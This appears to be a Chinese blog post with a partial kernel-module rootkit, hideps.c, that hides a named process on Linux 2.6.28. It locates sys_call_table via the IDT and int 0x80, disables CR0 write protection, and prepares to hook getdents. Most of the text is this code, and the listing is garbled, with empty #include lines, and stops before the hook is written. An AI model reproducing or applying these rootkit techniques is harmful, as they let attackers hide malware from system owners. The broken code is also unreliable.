隐藏进程的原理,可以查看其他相关文章,主要是通过int 0x80 找sys_call_table的地址。
测试环境: ubuntu9。04 内核版本2。6。28
模块代码如下:
/*hideps。c*/
#include linux/module。
h>
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
//#include
//#include
#define CALLOFF 100
//使用模块参数来定义需要隐藏的进程名
int orig_cr0;
char psname[10]="looptest";
char *processname=psname;
//module_param(processname, charp, 0);
struct {
unsigned short limit;
unsigned int base;
} __attribute__ ((packed)) idtr;
struct {
unsigned short off1;
unsigned short sel;
unsigned char none,flags;
unsigned short off2;
} __attribute__ ((packed)) * idt;
struct linux_dirent{
unsigned long
d_ino;
unsigned long
d_off;
unsigned short
d_reclen;
char
d_name[1];
};
void** sys_call_table;
unsigned int clear_and_return_cr0(void)
{
unsigned int cr0 = 0;
unsigned int ret;
asm volatile ("movl %%cr0, %%eax"
: "=a"(cr0)
);
ret = cr0;
/*clear the 20th bit of CR0,*/
cr0 &= 0xfffeffff;
asm volatile ("movl %%eax, %%cr0"
:
: "a"(cr0)
);
return ret;
}
void setback_cr0(unsigned int val)
{
asm volatile ("movl %%eax, %%cr0"
:
: "a"(val)
);
}
asmlinkage long (*orig_getdents)(unsigned int fd,
struct linux_dirent __user *dirp, unsigned int count);
char * findoffset(char *start)
{
char *p;
for (p = start; p < start + CALLOFF; p++)
if (*(p + 0) == '\xff' && *(p + 1) == '\x14' && *(p + 2) == '\x85')
return p;
return NULL;
}。
全部